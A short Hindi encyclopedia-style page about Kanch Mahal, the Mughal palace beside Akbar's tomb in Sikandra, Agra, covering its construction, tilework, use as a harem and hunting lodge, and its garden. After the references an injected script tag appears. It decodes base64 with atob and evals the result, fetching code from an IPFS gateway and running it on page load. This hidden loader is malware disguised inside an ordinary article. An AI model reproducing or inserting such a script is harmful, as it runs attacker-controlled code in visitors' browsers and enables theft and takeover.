काँच महल, आगरा

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
काँच महल, आगरा

काँच महल (अंग्रेज़ी: Kanch Mahal) उत्तर प्रदेश के प्रसिद्ध ऐतिहासिक शहर आगरा में स्थित है। आगरा के सिकंदरा में स्थित काँच महल अकबर के मकबरे के बगल में वर्गाकार है और मुग़ल वास्तुशिल्प की विशेषताओं का जीता-जागता उदाहरण है।

  • रिकॉर्ड से पता चलता है कि इसका निर्माण 1605 ई. से 1619 ई. के बीच किया गया था।
  • काँच महल के निर्माण में टाइल्स का भरपूर स्तेमाल हुआ है, इसलिए इसे कांच महल कहा जाता है।
  • इसका बाहरी हिस्सा पलास्टर के जरिए नक्काशीदार लाल पत्थर से जड़ा हुआ है।
  • काँच महल में कई वृत्ताकार स्थान है, जिसमें मदिरा रखने के बर्तन, फूल की लताएं और ज्यामितीय डिजाइन बनी हुई हैं।
  • महल का निर्माण पहले शाही औरतों के हरम के तौर पर किया गया था। बाद में जहांगीर ने इसका इस्तेमाल शिकार घर के रूप में किया।
  • इस दो मंजिला महल में इसके चारों दिशाओं में वर्गाकार कमरे बने हुए हैं। मुख्य हॉल में बिना किसी रुकावट के सूर्य की रोशनी और हवा के पहुंचने के लिए दो रास्ते बनाए गए हैं।[1]
  • कमरे में झरोखे और बालकॉनी भी है, जिससे न सिर्फ इसकी खूबसूरती में इजाफा होता है, बल्कि यह वेंटिलेशन का भी काम करता है।
  • यह काँच महल एक भव्य बाग से घिरा हुआ है, जिसमें पानी की नहर, टैंक और छोटे-छोटे पुल बने हुए हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. काँच महल (हिंदी) nativeplanet.com। अभिगमन तिथि: 21 मार्च, 2020।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>